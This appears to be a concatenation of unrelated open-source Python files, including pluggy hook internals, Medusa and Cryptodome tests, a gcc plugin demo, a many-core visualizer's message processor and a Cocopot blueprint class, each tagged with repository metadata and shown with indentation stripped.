"""
def setattr_hookimpl_opts(func):
setattr(
func,
self.project_name + "_impl",
dict(
hookwrapper=hookwrapper,
optionalhook=optionalhook,
tryfirst=tryfirst,
trylast=trylast,
specname=specname,
),
)
return func
if function is None:
return setattr_hookimpl_opts
else:
return setattr_hookimpl_opts(function)
def normalize_hookimpl_opts(opts):
opts.setdefault("tryfirst", False)
opts.setdefault("trylast", False)
opts.setdefault("hookwrapper", False)
opts.setdefault("optionalhook", False)
opts.setdefault("specname", None)
_PYPY = hasattr(sys, "pypy_version_info")
def varnames(func):
"""Return tuple of positional and keywrord argument names for a function,
method, class or callable.
In case of a class, its ``__init__`` method is considered.
For methods the ``self`` parameter is not included.
"""
if inspect.isclass(func):
try:
func = func.__init__
except AttributeError:
return (), ()
elif not inspect.isroutine(func): # callable object?
try:
func = getattr(func, "__call__", func)
except Exception:
return (), ()
try: # func MUST be a function or method here or we won't parse any args
spec = inspect.getfullargspec(func)
except TypeError:
return (), ()
args, defaults = tuple(spec.args), spec.defaults
if defaults:
index = -len(defaults)
args, kwargs = args[:index], tuple(args[index:])
else:
kwargs = ()
# strip any implicit instance arg
# pypy3 uses "obj" instead of "self" for default dunder methods
implicit_names = ("self",) if not _PYPY else ("self", "obj")
if args:
if inspect.ismethod(func) or (
"." in getattr(func, "__qualname__", ()) and args[0] in implicit_names
):
args = args[1:]
return args, kwargs
class _HookRelay:
""" hook holder object for performing 1:N hook calls where N is the number
of registered plugins.
"""
class _HookCaller:
def __init__(self, name, hook_execute, specmodule_or_class=None, spec_opts=None):
self.name = name
self._wrappers = []
self._nonwrappers = []
self._hookexec = hook_execute
self._call_history = None
self.spec = None
if specmodule_or_class is not None:
assert spec_opts is not None
self.set_specification(specmodule_or_class, spec_opts)
def has_spec(self):
return self.spec is not None
def set_specification(self, specmodule_or_class, spec_opts):
assert not self.has_spec()
self.spec = HookSpec(specmodule_or_class, self.name, spec_opts)
if spec_opts.get("historic"):
self._call_history = []
def is_historic(self):
return self._call_history is not None
def _remove_plugin(self, plugin):
def remove(wrappers):
for i, method in enumerate(wrappers):
if method.plugin == plugin:
del wrappers[i]
return True
if remove(self._wrappers) is None:
if remove(self._nonwrappers) is None:
raise ValueError(f"plugin {plugin!r} not found")
def get_hookimpls(self):
# Order is important for _hookexec
return self._nonwrappers + self._wrappers
def _add_hookimpl(self, hookimpl):
"""Add an implementation to the callback chain.
"""
if hookimpl.hookwrapper:
methods = self._wrappers
else:
methods = self._nonwrappers
if hookimpl.trylast:
methods.insert(0, hookimpl)
elif hookimpl.tryfirst:
methods.append(hookimpl)
else:
# find last non-tryfirst method
i = len(methods) - 1
while i >= 0 and methods[i].tryfirst:
i -= 1
methods.insert(i + 1, hookimpl)
def __repr__(self):
return f"<_HookCaller {self.name!r}>"
def __call__(self, *args, **kwargs):
if args:
raise TypeError("hook calling supports only keyword arguments")
assert not self.is_historic()
# This is written to avoid expensive operations when not needed.
if self.spec:
for argname in self.spec.argnames:
if argname not in kwargs:
notincall = tuple(set(self.spec.argnames) - kwargs.keys())
warnings.warn(
"Argument(s) {} which are declared in the hookspec "
"can not be found in this hook call".format(notincall),
stacklevel=2,
)
break
firstresult = self.spec.opts.get("firstresult")
else:
firstresult = False
return self._hookexec(self.name, self.get_hookimpls(), kwargs, firstresult)
def call_historic(self, result_callback=None, kwargs=None):
"""Call the hook with given ``kwargs`` for all registered plugins and
for all plugins which will be registered afterwards.
If ``result_callback`` is not ``None`` it will be called for for each
non-``None`` result obtained from a hook implementation.
"""
self._call_history.append((kwargs or {}, result_callback))
# Historizing hooks don't return results.
# Remember firstresult isn't compatible with historic.
res = self._hookexec(self.name, self.get_hookimpls(), kwargs, False)
if result_callback is None:
return
for x in res or []:
result_callback(x)
def call_extra(self, methods, kwargs):
""" Call the hook with some additional temporarily participating
methods using the specified ``kwargs`` as call parameters. """
old = list(self._nonwrappers), list(self._wrappers)
for method in methods:
opts = dict(hookwrapper=False, trylast=False, tryfirst=False)
hookimpl = HookImpl(None, "<temp>", method, opts)
self._add_hookimpl(hookimpl)
try:
return self(**kwargs)
finally:
self._nonwrappers, self._wrappers = old
def _maybe_apply_history(self, method):
"""Apply call history to a new hookimpl if it is marked as historic.
"""
if self.is_historic():
for kwargs, result_callback in self._call_history:
res = self._hookexec(self.name, [method], kwargs, False)
if res and result_callback is not None:
result_callback(res[0])
class HookImpl:
def __init__(self, plugin, plugin_name, function, hook_impl_opts):
self.function = function
self.argnames, self.kwargnames = varnames(self.function)
self.plugin = plugin
self.opts = hook_impl_opts
self.plugin_name = plugin_name
self.__dict__.update(hook_impl_opts)
def __repr__(self):
return f"<HookImpl plugin_name={self.plugin_name!r}, plugin={self.plugin!r}>"
class HookSpec:
def __init__(self, namespace, name, opts):
self.namespace = namespace
self.function = function = getattr(namespace, name)
self.name = name
self.argnames, self.kwargnames = varnames(function)
self.opts = opts
self.warn_on_impl = opts.get("warn_on_impl")
| RonnyPfannschmidt/pluggy | src/pluggy/_hooks.py | Python | mit | 11,521 |
mystring="40523116"
mystring=mystring +" test"
print(mystring)
| s40523116/2016fallcp_hw | w4.py | Python | agpl-3.0 | 66 |
# coding=utf-8
"""Tests for medusa/post_processor.py."""
from medusa.common import Quality
from medusa.name_parser.parser import NameParser
from medusa.post_processor import PostProcessor
import pytest
@pytest.mark.parametrize('p', [
{ # Test file in PP folder root
'file_path': '/media/postprocess/Show.Name.S01E01.1080p.HDTV.X264-DIMENSION.mkv',
'nzb_name': None,
'expected': {
'show': 'Show Name',
'season': 1,
'episodes': [1],
'quality': Quality.FULLHDTV,
'version': -1
}
},
{ # Test NZB Season pack
'file_path': '/media/postprocess/Show.Name.S02.Season.2.1080p.BluRay.x264-PublicHD/show.name.s02e10.1080p.bluray.x264-rovers.mkv',
'nzb_name': 'Show.Name.S02.Season.2.1080p.BluRay.x264-PublicHD',
'expected': {
'show': 'show name',
'season': 2,
'episodes': [10],
'quality': Quality.FULLHDBLURAY,
'version': -1
}
},
{ # Test NZB single episode
'file_path': '/media/postprocess/Show.Name.S03E13.1080p.HDTV.X264-DIMENSION/Show.Name.S03E13.1080p.HDTV.X264-DIMENSION.mkv',
'nzb_name': 'Show.Name.S03E13.1080p.HDTV.X264-DIMENSION',
'expected': {
'show': 'Show Name',
'season': 3,
'episodes': [13],
'quality': Quality.FULLHDTV,
'version': -1
}
},
{ # Test NZB single episode but random char name
'file_path': '/media/postprocess/Show.Name.S12E02.The.Brain.In.The.Bot.1080p.WEB-DL.DD5.1.H.264-R2D2/161219_06.mkv',
'nzb_name': 'Show.Name.S12E02.The.Brain.In.The.Bot.1080p.WEB-DL.DD5.1.H.264-R2D2',
'expected': {
'show': 'Show Name',
'season': 12,
'episodes': [2],
'quality': Quality.FULLHDWEBDL,
'version': -1
}
},
{ # Test NZB multi episode
'file_path': '/media/postprocess/Show.Name.S03E01E02.HDTV.x264-LOL/Show.Name.S03E01E02.HDTV.x264-LOL.mkv',
'nzb_name': 'Show.Name.S03E01E02.HDTV.x264-LOL',
'expected': {
'show': 'Show Name',
'season': 3,
'episodes': [1, 2],
'quality': Quality.SDTV,
'version': -1
}
},
])
def test_parse_info(p, monkeypatch, parse_method):
"""Run the test."""
# Given
monkeypatch.setattr(NameParser, 'parse', parse_method)
sut = PostProcessor(file_path=p['file_path'], nzb_name=p['nzb_name'])
# When
show, season, episodes, quality, version, airdate = sut._parse_info()
# Then
assert show is not None
assert p['expected'] == {
'show': show.name,
'season': season,
'episodes': episodes,
'quality': quality,
'version': version,
}
| fernandog/Medusa | tests/test_postprocessor_parse_info.py | Python | gpl-3.0 | 2,836 |
import unittest
from test import test_support
# The test cases here cover several paths through the function calling
# code. They depend on the METH_XXX flag that is used to define a C
# function, which can't be verified from Python. If the METH_XXX decl
# for a C function changes, these tests may not cover the right paths.
class CFunctionCalls(unittest.TestCase):
def test_varargs0(self):
self.assertRaises(TypeError, {}.has_key)
def test_varargs1(self):
with test_support._check_py3k_warnings():
{}.has_key(0)
def test_varargs2(self):
self.assertRaises(TypeError, {}.has_key, 0, 1)
def test_varargs0_ext(self):
try:
{}.has_key(*())
except TypeError:
pass
def test_varargs1_ext(self):
with test_support._check_py3k_warnings():
{}.has_key(*(0,))
def test_varargs2_ext(self):
try:
with test_support._check_py3k_warnings():
{}.has_key(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_varargs0_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2)
def test_varargs1_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2)
def test_varargs2_kw(self):
self.assertRaises(TypeError, {}.has_key, x=2, y=2)
def test_oldargs0_0(self):
{}.keys()
def test_oldargs0_1(self):
self.assertRaises(TypeError, {}.keys, 0)
def test_oldargs0_2(self):
self.assertRaises(TypeError, {}.keys, 0, 1)
def test_oldargs0_0_ext(self):
{}.keys(*())
def test_oldargs0_1_ext(self):
try:
{}.keys(*(0,))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_2_ext(self):
try:
{}.keys(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_0_kw(self):
try:
{}.keys(x=2)
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs0_1_kw(self):
self.assertRaises(TypeError, {}.keys, x=2)
def test_oldargs0_2_kw(self):
self.assertRaises(TypeError, {}.keys, x=2, y=2)
def test_oldargs1_0(self):
self.assertRaises(TypeError, [].count)
def test_oldargs1_1(self):
[].count(1)
def test_oldargs1_2(self):
self.assertRaises(TypeError, [].count, 1, 2)
def test_oldargs1_0_ext(self):
try:
[].count(*())
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs1_1_ext(self):
[].count(*(1,))
def test_oldargs1_2_ext(self):
try:
[].count(*(1, 2))
except TypeError:
pass
else:
raise RuntimeError
def test_oldargs1_0_kw(self):
self.assertRaises(TypeError, [].count, x=2)
def test_oldargs1_1_kw(self):
self.assertRaises(TypeError, [].count, {}, x=2)
def test_oldargs1_2_kw(self):
self.assertRaises(TypeError, [].count, x=2, y=2)
def test_main():
test_support.run_unittest(CFunctionCalls)
if __name__ == "__main__":
test_main()
| mancoast/CPythonPyc_test | cpython/266_test_call.py | Python | gpl-3.0 | 3,290 |
from crank.core.exercise import Exercise
TEST_EXERCISE_LINES = [
'Swing, KB: 28 x 35',
'Squat: 20, 60 x 5, 80, 90 x 3, 91, 105 x 5, 119 x 4',
'- unit: kg',
'- coming off drill weekend, tired and small',
'Curl, ring: 10/5',
'Plate pinch: 15 x 35/30'
]
TEST_EXERCISE_V2_LINES = [
'Swing, KB:',
' 1) 28 x 35',
'- units: kgs x reps',
'Squat:',
'- unit: kg',
'- coming off drill weekend, tired and small',
' 2) 20 x 5',
' 3) [30] 60 x 5',
' 4) 80 x 3',
' 5) [30] 90 x 3',
' 6) 91 x 5',
' 7) 105 x 5',
' 8) [300] 119 x 4',
'Curl, ring:',
'- units: lbs x reps',
' 9) 10',
' 10) [30] 5',
'Plate pinch: ',
'- unit: kgs x seconds',
' 11) 15 x 35',
' 12) [60] 15 x 30'
]
TEST_SQUAT_LINES = TEST_EXERCISE_V2_LINES[3:13]
TEST_SQUAT_V2_JSON = {
'name': 'Squat',
'tags': {
'unit': 'kg',
'comment': 'coming off drill weekend, tired and small',
},
'sets': [
{'work': 20, 'reps': 5, 'order': 2},
{'work': 60, 'reps': 5, 'order': 3, 'rest': 30},
{'work': 80, 'reps': 3, 'order': 4},
{'work': 90, 'reps': 3, 'order': 5, 'rest': 30},
{'work': 91, 'reps': 5, 'order': 6},
{'work': 105, 'reps': 5, 'order': 7},
{'work': 119, 'reps': 4, 'order': 8, 'rest': 300},
],
}
TEST_EXERCISE = Exercise.from_json(TEST_SQUAT_V2_JSON)
def test_exercise_parsing():
ex, _ = Exercise.parse(TEST_SQUAT_LINES)
assert ex == TEST_EXERCISE
def test_to_json():
d = TEST_EXERCISE.to_json()
assert 'name' in d
assert 'tags' in d
assert 'sets' in d
assert 'raw_sets' not in d
def test_from_json():
ex = Exercise.from_json(TEST_SQUAT_V2_JSON)
assert ex.name == TEST_EXERCISE.name
assert ex.tags == TEST_EXERCISE.tags
assert ex.raw_sets == TEST_EXERCISE.raw_sets
assert ex.sets == TEST_EXERCISE.sets
def test_encoding():
assert TEST_EXERCISE.to_json() == TEST_SQUAT_V2_JSON
def test_parsing_exercise_lines():
exs = Exercise.parse_exercises(TEST_EXERCISE_LINES)
assert len(exs) == 4
| jad-b/Crank | crank/core/tests/test_exercise.py | Python | mit | 2,120 |
from django.core.urlresolvers import resolve
from django.dispatch import receiver
from django.template import Context
from django.template.loader import get_template
from pretix.base.signals import register_payment_providers
from pretix.presale.signals import html_head
@receiver(register_payment_providers)
def register_payment_provider(sender, **kwargs):
from .payment import Stripe
return Stripe
@receiver(html_head)
def html_head_presale(sender, request=None, **kwargs):
from .payment import Stripe
provider = Stripe(sender)
url = resolve(request.path_info)
if provider.is_enabled and ("checkout.payment" in url.url_name or "order.pay" in url.url_name):
template = get_template('pretixplugins/stripe/presale_head.html')
ctx = Context({'event': sender, 'settings': provider.settings})
return template.render(ctx)
else:
return ""
| lab2112/pretix | src/pretix/plugins/stripe/signals.py | Python | apache-2.0 | 899 |
import psutil
_mb_conversion = 1024 * 1024
def cpu_times(*args, **kwargs):
return psutil.cpu_times()
def cpu_count(logical=True, *args, **kwargs):
cores = psutil.cpu_count(logical)
if cores == 1:
word = 'Core'
else:
word = 'Cores'
return '{} CPU {}'.format(cores, word)
def cpu_frequency(*args, **kwargs):
freq = psutil.cpu_freq()
if freq is None:
return ('CPU frequency file moved or not present. See: '
'https://stackoverflow.com/questions/42979943/python3-psutils')
return [x.max for x in freq]
def virtual_memory_percent(*arg, **kwargs):
percent = psutil.virtual_memory().percent
return '{}%'.format(percent)
def virtual_memory_total(*args, **kwargs):
total = int(psutil.virtual_memory().total / _mb_conversion)
return '{} Mb'.format(total)
def virtual_memory_used(*args, **kwargs):
used = int(psutil.virtual_memory().used / _mb_conversion)
return '{} Mb'.format(used)
def swap(*args, **kwargs):
swap = psutil.swap_memory()
used = swap.used
total = swap.total
used = int(used/_mb_conversion)
total = int(total/_mb_conversion)
return 'Used: {} | Total: {}'.format(used, total)
| benhoff/vexbot | vexbot/extensions/system.py | Python | gpl-3.0 | 1,216 |
# -*- coding: utf-8 -*-
#
# SelfTest/Hash/test_SHA3_512.py: Self-test for the SHA-3/512 hash function
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Cryptodome.Hash.SHA3_512"""
import unittest
from binascii import hexlify
from Cryptodome.SelfTest.loader import load_tests
from Cryptodome.SelfTest.st_common import list_test_cases
from StringIO import StringIO
from Cryptodome.Hash import SHA3_512 as SHA3
from Cryptodome.Util.py3compat import b
class APITest(unittest.TestCase):
def test_update_after_digest(self):
msg=b("rrrrttt")
# Normally, update() cannot be done after digest()
h = SHA3.new(data=msg[:4])
dig1 = h.digest()
self.assertRaises(TypeError, h.update, msg[4:])
dig2 = SHA3.new(data=msg).digest()
# With the proper flag, it is allowed
h = SHA3.new(data=msg[:4], update_after_digest=True)
self.assertEquals(h.digest(), dig1)
# ... and the subsequent digest applies to the entire message
# up to that point
h.update(msg[4:])
self.assertEquals(h.digest(), dig2)
def get_tests(config={}):
from common import make_hash_tests
tests = []
test_vectors = load_tests(("Cryptodome", "SelfTest", "Hash", "test_vectors", "SHA3"),
"ShortMsgKAT_SHA3-512.txt",
"KAT SHA-3 512",
{ "len" : lambda x: int(x) } )
test_data = []
for tv in test_vectors:
if tv.len == 0:
tv.msg = b("")
test_data.append((hexlify(tv.md), tv.msg, tv.desc))
tests += make_hash_tests(SHA3, "SHA3_512", test_data,
digest_size=SHA3.digest_size,
oid="2.16.840.1.101.3.4.2.10")
tests += list_test_cases(APITest)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| chronicwaffle/PokemonGo-DesktopMap | app/pylibs/win32/Cryptodome/SelfTest/Hash/test_SHA3_512.py | Python | mit | 2,984 |
# Copyright 2011 David Malcolm <dmalcolm@redhat.com>
# Copyright 2011 Red Hat, Inc.
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
# <http://www.gnu.org/licenses/>.
# Sample python script, to be run by our gcc plugin (see "make test")
#print "hello world"
import gcc
import sys
print('sys.version: %s' % sys.version)
#print 'sys.path:', sys.path
#help(gcc)
print(help(gcc.AddrExpr))
print(gcc.Type)
print(gcc.Type.char)
print(help(gcc.Type))
from gccutils import get_src_for_loc, cfg_to_dot, invoke_dot
def my_pass_execution_callback(*args, **kwargs):
print('my_pass_execution_callback was called: args=%r kwargs=%r' % (args, kwargs))
print('gcc.get_translation_units(): %s' % gcc.get_translation_units())
for u in gcc.get_translation_units():
print('u: %s %r' % (u, u))
u.debug()
print('u.block: %s' % u.block)
#help(args[0])
(optpass, fun) = args
print('optpass: %r' % optpass)
print('dir(optpass): %r' % dir(optpass))
print('optpass.name: %r' % optpass.name)
print('fun: %r' % fun)
if fun:
print('fun.cfg: %r' % fun.cfg)
if fun.cfg:
#print help(fun.cfg)
print('fun.cfg.basic_blocks: %r' % fun.cfg.basic_blocks)
print('fun.cfg.entry: %r' % fun.cfg.entry)
print('fun.cfg.exit: %r' % fun.cfg.exit)
print('fun.cfg.entry.succs: %r' % fun.cfg.entry.succs)
print('fun.cfg.exit.preds: %r' % fun.cfg.exit.preds)
dot = cfg_to_dot(fun.cfg)
print(dot)
invoke_dot(dot)
for bb in fun.cfg.basic_blocks:
print('bb: %r' % bb)
print('bb.gimple: %r' % bb.gimple)
if isinstance(bb.gimple, list):
for stmt in bb.gimple:
print(' %r: %r : %s column: %i block: %r' % (stmt, repr(str(stmt)), stmt.loc, stmt.loc.column, stmt.block))
print(get_src_for_loc(stmt.loc))
print(' ' * (stmt.loc.column-1) + '^')
if hasattr(stmt, 'loc'):
print(' stmt.loc: %r' % stmt.loc)
if hasattr(stmt, 'lhs'):
print(' stmt.lhs: %r' % stmt.lhs)
if hasattr(stmt, 'exprtype'):
print(' stmt.exprtype: %r' % stmt.exprtype)
if hasattr(stmt, 'exprcode'):
print(' stmt.exprcode: %r' % stmt.exprcode)
if hasattr(stmt, 'fn'):
print(' stmt.fn: %r %s' % (stmt.fn, stmt.fn))
if hasattr(stmt, 'retval'):
print(' stmt.retval: %r' % stmt.retval)
if hasattr(stmt, 'rhs'):
print(' stmt.rhs: %r' % stmt.rhs)
def my_pre_genericize_callback(*args, **kwargs):
print('my_pre_genericize_callback was called: args=%r kwargs=%r' % (args, kwargs))
#help(args[0])
t = args[0]
print(t)
print(dir(t))
print(type(t))
print(repr(t))
print(str(t))
#print(help(t))
print('t.name: %r' % t.name)
print('t.addr: %s' % hex(t.addr))
print('t.type: %r' % t.type)
print('t.function: %r' % t.function)
#print(help(t.function))
print('t.type.type: %r' % t.type.type)
loc = t.location
print(loc)
print(dir(loc))
print(type(loc))
print(repr(loc))
#print(help(loc))
print('loc.file: %r' % loc.file)
print('loc.line: %r' % loc.line)
# raise RuntimeError('what happens if we get an error here?')
gcc.register_callback(gcc.PLUGIN_PASS_EXECUTION,
my_pass_execution_callback)
gcc.register_callback(gcc.PLUGIN_PRE_GENERICIZE,
my_pre_genericize_callback)
# Try some insane values:
#gcc.register_callback(-1, my_callback)
# Stupid hack idea: a UI for gcc:
#import gtk
#w = gtk.Window(gtk.WINDOW_TOPLEVEL)
#w.show()
#gtk.main()
#from pprint import pprint
#pprint(tree.subclass_for_code)
| jasonxmueller/gcc-python-plugin | test.py | Python | gpl-3.0 | 4,676 |
"""
ManyMan - A Many-core Visualization and Management System
Copyright (C) 2012
University of Amsterdam - Computer Systems Architecture
Jimi van der Woning and Roy Bakker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from kivy.logger import Logger
import json
# List of valid message types.
known_msg_types = (
'server_init',
'status',
'task_output',
'sim_data',
'selection_set',
'invalid_message'
)
class InvalidMessage(Exception):
"""Define the InvalidMessage exception. Only for naming conventions."""
pass
class MessageProcessor:
"""Processor for all messages that arrive in ManyMan's front-end."""
def __init__(self, comm):
self.comm = comm
def process(self, msg):
"""Process the given message 'msg'."""
try:
data = json.loads(msg)
#print(data)
if not data['type'] in known_msg_types:
raise InvalidMessage('Unknown message type: %s' % data['type'])
elif not self.comm.initialized and data['type'] != 'server_init':
raise InvalidMessage(
'Did not receive initialization message first.'
)
elif self.comm.manyman.started or not self.comm.initialized:
getattr(self, "process_" + data['type'])(data['content'])
except Exception, e:
import traceback
Logger.error(
'MsgProcessor: Received invalid message:\n - %s\n - %s\n' \
' - %s\n - %s' % (e, type(e), msg, traceback.format_exc())
)
# EDITED!
def process_server_init(self, msg):
"""Process the server_init message."""
self.comm.manyman.chip_name = msg['name']
self.comm.manyman.chip_cores = msg['cores']
self.comm.manyman.sample_vars = msg['sample_vars']
self.comm.manyman.current_vars = msg['default_vars']
if 'orientation' in msg:
self.comm.manyman.chip_orientation = msg['orientation']
Logger.info("MsgProcessor: Initialized %s, a %d-core chip" %
(msg['name'], msg['cores']))
self.comm.initialized = True
def process_status(self, msg):
"""Process a status message."""
mm = self.comm.manyman
total_load = 0
# Update the loads of the cores
for i in mm.cores.keys():
core = mm.cores[i]
load = msg['chip']['Cores'][i]['CPU'] / 100.0
core.update_load(load)
total_load += load
mem = msg['chip']['Cores'][i]['MEM'] / 100.0
core.update_mem(mem)
core.frequency = msg['chip']['Cores'][i]['Frequency']
core.voltage = msg['chip']['Cores'][i]['Voltage']
task_ids = []
new_count = dict()
# Update all task information
for task in msg['chip']['Tasks']:
if mm.has_task(task['ID']):
t = mm.tasks[task['ID']]
if task["Status"] in ["Finished", "Failed"] and \
not t.status in ["Finished", "Failed"]:
mm.finish_task(task['ID'], task['Status'])
elif not task['Status'] in ["Finished", "Failed"] and \
((not t.core and task['Core'] >= 0) or \
(t.core and t.core.index != task['Core'])):
if task['Core'] < 0:
mm.move_task(t)
else:
mm.move_task(t, mm.cores[task['Core']])
else:
t = mm.add_task(
task['ID'],
task['Name'],
task['Core'],
task['Status']
)
# Count the number of tasks per core
if not task['Status'] in ["Finished", "Failed", "Stopped"]:
if task['Core'] in new_count:
new_count[task['Core']] += 1
else:
new_count[task['Core']] = 1
if t:
task_ids.append(task['ID'])
t.status = task['Status']
if t.core:
t.load_cpu = task['CPU']
t.load_mem = task['MEM']
# Update the number of running tasks per core
for core in range(len(mm.cores)):
count = 0
if core in new_count:
count = new_count[core]
mm.cores[core].pending_count = count
# Remove all stopped tasks from the system
for task in filter(lambda x: x not in task_ids, mm.tasks):
Logger.debug("MsgProcessor: %s no longer running" % task)
mm.remove_task(task)
# Calculate the total load
total_load /= len(mm.cores)
Logger.debug("MsgProcessor: Total load: %.1f%%" % (total_load * 100.))
mm.cpu_load = total_load
mm.cpu_power = msg['chip']['Power']
def process_task_output(self, msg):
"""Process a task_output message."""
if not self.comm.manyman.has_task(msg['id']):
return
t = self.comm.manyman.tasks[msg['id']]
t.set_output(msg['output'])
def process_sim_data(self, msg):
mm = self.comm.manyman
#mm.components_list['cpu0'].update_load(0.5)
mm.previous_kernel_cycle = mm.current_kernel_cycle
mm.current_kernel_cycle = msg['data']['kernel.cycle']
delay = msg['status']['delay']
status = msg['status']['sim']
step = msg['status']['step']
if status == 0:
mm.status_label.text = "simulator status\n\npaused"
else:
mm.status_label.text = "simulator status\n\nrunning"
mm.kernel_label.text = "kernel cycle\n\n" + str(mm.current_kernel_cycle)
mm.delay_label.text = "current send delay\n\n" + str(delay)
mm.step_label.text = "current steps\n\n" + str(step)
for k, v in msg['data'].items():
#print k
components = k.split(':')
if components[0] in mm.components_list:
if len(components) < 2:
mm.components_list[components[0]].update_data(components[0], v)
elif len(components) > 2:
mm.components_list[components[0]].update_data(':'.join(components[1:]), v)
else:
mm.components_list[components[0]].update_data(components[1], v)
#print components[0], mm.components_list[components[0]].get_data(components[0])
#if v != 0:
# mm.components_list[components[0]].update_load(0.5)
#print components[0] + ': ' + str(v)
def process_selection_set(self, msg):
mm = self.comm.manyman
mm.sample_vars = msg['sample_vars']
mm.current_vars = mm.current_vars2
mm.layout.remove_widget(mm.rightbar)
mm.layout.remove_widget(mm.core_grid)
mm.init_core_grid()
mm.layout.add_widget(mm.rightbar)
mm.comm.selection_send()
def process_invalid_message(self, msg):
"""Process an invalid_message message."""
Logger.warning(
"MsgProcessor: Sent an invalid message to the server:\n %s" % \
msg['message']
)
| 6366295/ManyMan-for-mgsim | messageprocessor.py | Python | gpl-3.0 | 8,035 |
# -*- coding: utf-8 -*-
"""
Blueprints are the recommended way to implement larger or more
pluggable applications.
"""
from functools import update_wrapper
class Blueprint(object):
"""Represents a blueprint.
"""
def __init__(self, name, url_prefix=None, url_defaults=None):
self.app = None
self.name = name
self.url_prefix = url_prefix
self.deferred_functions = []
self.view_functions = {}
self.url_defaults = url_defaults or {}
self.register_options = {}
def record(self, func):
"""Registers a function that is called when the blueprint is
registered on the application. This function is called with the
state as argument as returned by the `make_setup_state`
method.
"""
if self.app:
from warnings import warn
warn('The blueprint was already registered once '
'but is getting modified now. These changes '
'will not show up.')
self.deferred_functions.append(func)
def register(self, app, options):
"""Called by `Cocopot.register_blueprint` to register a blueprint
on the application. This can be overridden to customize the register
behavior. Keyword arguments from
`~cocopot.Cocopot.register_blueprint` are directly forwarded to this
method in the `options` dictionary.
"""
self.app = app
self.register_options = options or {}
for deferred in self.deferred_functions:
deferred(self)
def route(self, rule, **options):
"""Like `Cocopot.route` but for a blueprint.
"""
def decorator(f):
endpoint = options.pop("endpoint", f.__name__)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""Like `Cocopot.add_url_rule` but for a blueprint.
"""
if endpoint:
assert '.' not in endpoint, "Blueprint endpoint's should not contain dot's"
self.record(lambda s:
s.app_add_url_rule(rule, endpoint, view_func, **options))
def app_add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""A helper method to register a rule (and optionally a view function)
to the application. The endpoint is automatically prefixed with the
blueprint's name.
"""
url_prefix = self.register_options.get('url_prefix') or self.url_prefix
if url_prefix:
rule = url_prefix + rule
if endpoint is None:
endpoint = view_func.__name__
defaults = self.url_defaults
if 'defaults' in options:
defaults = dict(defaults, **options.pop('defaults'))
self.app.add_url_rule(rule, '%s.%s' % (self.name, endpoint),
view_func, defaults=defaults, **options)
def endpoint(self, endpoint):
"""Like `Cocopot.endpoint` but for a blueprint. This does not
prefix the endpoint with the blueprint name, this has to be done
explicitly by the user of this method. If the endpoint is prefixed
with a `.` it will be registered to the current blueprint, otherwise
it's an application independent endpoint.
"""
def decorator(f):
def register_endpoint(self):
self.app.view_functions['%s.%s' % (self.name, endpoint)] = f
self.record(register_endpoint)
return f
return decorator
def before_request(self, f):
"""Like `Cocopot.before_request` but for a blueprint. This function
is only executed before each request that is handled by a function of
that blueprint.
"""
self.record(lambda s: s.app.before_request_funcs
.setdefault(self.name, []).append(f))
return f
def before_app_request(self, f):
"""Like `Cocopot.before_request`. Such a function is executed
before each request, even if outside of a blueprint.
"""
self.record(lambda s: s.app.before_request_funcs
.setdefault(None, []).append(f))
return f
def after_request(self, f):
"""Like `Cocopot.after_request` but for a blueprint. This function
is only executed after each request that is handled by a function of
that blueprint.
"""
self.record(lambda s: s.app.after_request_funcs
.setdefault(self.name, []).append(f))
return f
def after_app_request(self, f):
"""Like `Cocopot.after_request` but for a blueprint. Such a function
is executed after each request, even if outside of the blueprint.
"""
self.record(lambda s: s.app.after_request_funcs
.setdefault(None, []).append(f))
return f
def teardown_request(self, f):
"""Like `Cocopot.teardown_request` but for a blueprint. This
function is only executed when tearing down requests handled by a
function of that blueprint. Teardown request functions are executed
when the request context is popped, even when no actual request was
performed.
"""
self.record(lambda s: s.app.teardown_request_funcs
.setdefault(self.name, []).append(f))
return f
def teardown_app_request(self, f):
"""Like `Cocopot.teardown_request` but for a blueprint. Such a
function is executed when tearing down each request, even if outside of
the blueprint.
"""
self.record(lambda s: s.app.teardown_request_funcs
.setdefault(None, []).append(f))
return f
def app_errorhandler(self, code):
"""Like `Cocopot.errorhandler` but for a blueprint. This
handler is used for all requests, even if outside of the blueprint.
